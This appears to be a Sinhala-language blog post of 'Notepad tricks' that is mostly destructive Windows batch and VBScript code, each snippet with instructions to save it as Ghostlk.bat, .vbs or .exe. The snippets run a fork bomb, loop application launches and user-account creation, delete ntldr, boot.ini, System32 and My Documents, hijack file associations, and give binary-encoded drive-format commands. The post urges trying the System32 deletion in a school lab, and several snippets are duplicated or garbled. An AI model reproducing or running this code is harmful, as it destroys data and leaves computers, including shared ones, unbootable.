Windows මෙහෙයුම්
පද්දතියෙ තියන පහසු කමක් තමයි Notepad කියන්නෙ,හැමෝම දන්නව නොදන්න කෙනෙක් නැති තරම්.Notepad ගැන ඔයල මොනාද දන්නේ? ඇත්තටම කරන්න පුලුවන් Type
කරන එක
විතරමද? වෙන මොකුත්ම කරන්න බැරිද? අද අපි දෙන්න යන්නෙ Notepad
එක බාවිත කරල
කරන්න පුලුවන් වැඩ ටිකක්.
අනුන්ට
හානියක් කිරීමේ අරමුණින් මේවා කරන්න එපා.
01.පහල Code
එකෙන් වෙන්නෙ
ලියලා තියන වැඩ සටහන් නොනැවතී Open වෙන එකයි.මේකට ඔයලා තව කැමති ඒවා එකතු කරගන්න පුලුවන්.Win Word,Paint,Notepad,Cmd,Explorer කියන
ඇප්ලිකේශන් දිගින් දිගටම Open වෙන්න තමයි පහල කෝඩ් එක ලියල තියෙන්නෙ.අවසන් ප්රතිපලය පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර
වීමක් තමයි සිද්ද වෙන්නෙ. Save කරන විට Save As ගිහින් Ghostlk.Bat
කියල Save කරගන්න.
Extension එක වෙන්නෙ .Bat
@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
02. මෙතනදී සිදුවන්නේත් දිගින් දිගටම පෝල්ඩයරන් නිර්මානය වීමයි. අවසන් ප්රතිපලය පරිගනකයේ මතකයට මෙය දරා ගැනීමට නොහැකිව පරිගණකය හිර වීමක් සිදු වෙනව. Save කරන විට Save
As ගිහින් Ghostlk.Bat කියල Save කරගන්න. Extension එක වෙන්නෙ .Bat
@echo off
:x
md %random%
goto x
:x
md %random%
goto x
03. මෙහිදී User Accounts දිගින් දිගටම
නිර්මාණය කිරීමක් සිදුවෙනව .මෙහිදීත්
සිදුවන්නෙ පරිගනකය සිර වීමක්. Save කරන විට Save As ගිහින් Ghostlk.Bat
කියල Save කරගන්න.
Extension එක වෙන්නෙ .Bat
@echo off
:x
net user %random% /add
goto x
:x
net user %random% /add
goto x
04.මේ කෝඩ් එකෙන් සිදුවන්නෙ පරිගනකය Boot කරන්න ඕන File
එක මකල දමන
එක .එතකොට පරිගනකය බූට් කරන්න බැරි තත්වයට
පත් වෙනවා. Ntldr කියන
File එක තමයි මේ
කෝඩ් එකෙන් මැකිලා යන්නේ.ඒ File
එක තමයි
පරිගනකය Boot කරන්න ප්රදාන වශයෙන් බලපාන්නෙ.
Save කරන විට Save As ගිහින් Ghostlk.Bat
කියල Save කරගන්න.
Extension එක වෙන්නෙ .Bat
attrib -S -R -H C:\ntldr
del ntldr
del ntldr
05.මේ කෝඩ් එක Cup Usage එක 100% දක්වා අනිසි
ආකාරයෙන් ඉහල යවන්න හැකි වෙන්ව. Save කරන විට Save As ගිහින් Ghostlk.Bat
කියල Save කරගන්න.
Extension එක වෙන්නෙ .Bat
%0|%0
06.මෙම කේතයෙන්
සිදුවන්නෙ පරිගනකයෙ තිබෙන නොයෙක් ආකාරයෙ ගොනු වෙනත් ගොනු වර්ගයක් බවට පත් කරන එකයි.උදාහරනයක් ව්දිහට .Jpg
කියන Format එක .Txt කියන Format එක බවට පත් වෙනව .පරිගනකයෙ
තිබෙන සියලුම Jpg Files Txt File බවට පත් කරන
එක මේ කෝඩ් එකෙන් කරන්නෙ. Extension කියන තැනට මාරු කරන්න ඕනේ File Format එක දාන්න.
උදාහරණයක්
ලෙස [Assoc .Txt=.Exe] Save කරන විට Save As ගිහින් Ghostlk.Bat
කියල Save කරගන්න.
Extension එක වෙන්නෙ .Bat
@echo off
assoc .txt= Extension
assoc .exe= Extension
assoc .jpeg= Extension
assoc .png= Extension
assoc .mpeg= Extension
assoc .txt= Extension
assoc .exe= Extension
assoc .jpeg= Extension
assoc .png= Extension
assoc .mpeg= Extension
07. මේ කේතයෙන් සිදුවන්නෙ කී බෝඩ් එකෙ
තියන ලයිට් දැල් වෙන එකයි.පහල කේතය නෝට්පෑඩ් එකට කොපි කරගෙන Save As ගිහින් Ghostlk.Vbs
ආකාරයට Save කරගන්න.මතක තියාගන්න
Extension එක .Vbs
msgbox"This is a
Virus Created By Ghost Man,No harm will be Done to ur PC,,Use Task Manager to
stop this "
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
08.ඊලග කේතයෙන සිදුවෙන්නේ Cd,Dvd Rom එක දිගින් දිගටම Open
Close වෙන එකයි .අපි බලමු ඒවගේ කේතයක් ලියන්නෙ කොහොමද කියල. පහල කේතය නෝට්පෑඩ් එකට කොපි කරගෙන Save As ගිහින් Ghostlk.Vbs
ආකාරයට Save කරගන්න.
Set
oWMP = CreateObject(“WMPlayer.OCX.7?)
Set
colCDROMs = oWMP.cdromCollection
do
if
colCDROMs.Count >= 1 then
For
i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For
i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End
If
wscript.sleep
5000
loop
09.මේ කේතය හරියට ඇන්ටි වයිරස් ගාඩ් එකක්
වගේ ක්රියාත්මක වෙනවා.ඒ කියන්නෙ Pen
Drive එකේ ඔක්කොම
ෆයිල් ෂෝට් කට් වීම, Folders,File පේන්නන්නේ
නැතිවීම වගේ ගැටළුවලට අපිට ගොඩක් වෙලාවට මුහුණ පාන්න වෙනවා.ඒ වගේ වෙලාවට අපිට පුලුවන් Notepad එක හරහා මේ ගැටලුවට පිලිතුරක් ලබාගන්න.Save කරනකොට .Bat
කියල Save කරන්න.(Ghostlk.Bat)
echo off
color 9f
cls
echo.
echo.
echo.
echo.
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo ++ ++
echo ++ ++
echo ++ *** ShortCut Virus Remover *** ++
echo ++ ++
echo ++ ++
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo.
echo.
echo Recommend only to use in Flash drives.
echo.
echo If this file is on your Desktop it will badly affect to your Desktop Icons !!!
echo.
echo.
echo.
echo.
echo Shortcut Virus Remover is going to repair your Flash drive..........
echo.
pause
cls
echo.
echo.
echo.
echo.
echo Cleaning process will take few seconds..........
echo Please wait..........
echo.
echo.
echo.
del *.lnk
del fypuas.exe
del fypuasx.exe
cls
echo.
echo.
echo Removing Shortcuts........... Complete.
echo.
echo.
echo.
echo Make visible your folder........... is in process..........
echo This process will take few minutes..........
echo.
echo Please wait..........
attrib /s /d -s -h -r *.*
cls
echo.
echo.
echo.
echo Shortcut Virus Remover finish its Job.........
echo.
echo Your Flash drive is OK now
echo.
echo.
echo.
echo Check your Flash drive for unknown files and folders.
echo If there is any, delete them.
echo.
echo.
echo.
echo.
echo.
echo.
echo Cleaning Process Complete.
echo.
echo.
echo Developed by Ghost Man.......
echo.
echo.
echo.
pause
color 9f
cls
echo.
echo.
echo.
echo.
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo ++ ++
echo ++ ++
echo ++ *** ShortCut Virus Remover *** ++
echo ++ ++
echo ++ ++
echo ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
echo.
echo.
echo Recommend only to use in Flash drives.
echo.
echo If this file is on your Desktop it will badly affect to your Desktop Icons !!!
echo.
echo.
echo.
echo.
echo Shortcut Virus Remover is going to repair your Flash drive..........
echo.
pause
cls
echo.
echo.
echo.
echo.
echo Cleaning process will take few seconds..........
echo Please wait..........
echo.
echo.
echo.
del *.lnk
del fypuas.exe
del fypuasx.exe
cls
echo.
echo.
echo Removing Shortcuts........... Complete.
echo.
echo.
echo.
echo Make visible your folder........... is in process..........
echo This process will take few minutes..........
echo.
echo Please wait..........
attrib /s /d -s -h -r *.*
cls
echo.
echo.
echo.
echo Shortcut Virus Remover finish its Job.........
echo.
echo Your Flash drive is OK now
echo.
echo.
echo.
echo Check your Flash drive for unknown files and folders.
echo If there is any, delete them.
echo.
echo.
echo.
echo.
echo.
echo.
echo Cleaning Process Complete.
echo.
echo.
echo Developed by Ghost Man.......
echo.
echo.
echo.
pause
10.පහලකෝඩ් එකෙන් වෙන්නෙ වින්ඩෝස්
මෙහෙයුම් පද්දතියෙ තියන System 32 කියන ෆෝල්ඩර් එක ඉවත් කරන එක.කරල බලනව නම් School
එකෙ Lab එකේ ඉන්න වෙලාවක අත්හදා බලන්න.Save කරනවිට Ghostlk.Bat
කියල Save කරගන්න .
del
c:\WINDOWS\system32\*.*/q
11.ඊලග කෝඩ් එක කිසියම් කාල පරාසයක් තුල
පරිගනකය Shutdown වෙන ආකාරයේ කෝඩ් එකක්. S
අකුර වෙනුවට R හෝ L අකුර දාන්න
පුලුවන්.
S - කියන්නෙ Shutdown, R - කියන්නේ Restart,
L - කියන්නෙ Log Off. T30 කියන්නෙ කාලය,ඒකත් කැමති ආකාරයකට
වෙනස් කරගන්න පුලුවන්.
Save කරනකොට Ghostlk.Exe
Shutdown -s -t 30 -c
"Create By Ghost Man"
12.ඊලග කෝඩ් එකට පුලුවන් Hard Disk එක ෆෝමැට් කරලා දාන්න. මේ Code එකෙන් C: Drive එක ෆෝමැට් වෙනවා.Save
කරනකොට Ghostlk.Exe කියල ෆයිල් නේම් එකට දෙන්න.
01100110011011110111001001101101011000010111010000
100000011000110011101001011100
0010000000101111010100010010111101011000
13.මෙන්න මේකෙන් D: එක Save කරනකොට Ghostlk.Exe
01100110011011110111001001101101011000010111010000
100000011001000011101001011100
0010000000101111010100010010111101011000
14.මෙන්න මේකෙන් A: එක Save කරනකොට Ghostlk.Exe
01100110011011110111001001101101011000010111010000
100000011000010011101001011100
0010000000101111010100010010111101011000
15.පහල කෝඩ් එකෙන් Boot.Ini ගොනුව මැකෙනව.එතකොට
පරිගනකය Boot වෙන්නෙ නැතිව යනවා.ඒ වගේම කෝඩ් එකක් මම කලින් දුන්නා. Save
කරනකොට Ghostlk.Exe
01100100011001010110110000100000001011110100011000
101111010100110010111101010001
00100000011000110011101001011100011000100110111101
101111011101000010111001101001
0110111001101001
16.මේ කෝඩ් එක කරන්නෙ My Document කියන ෆයිල් එක ඉවත් කරලා දාන එක. BAT
File Extension ආකාරයට Save
කරගන්න.ඒ
කිව්වේ Ghostlk.BAT
rmdir C:\Documents and
Settings \S\Q
අත්හදා බැලීම අති භයානකයි. ප්‍රවේශම් වන්න.
ReplyDelete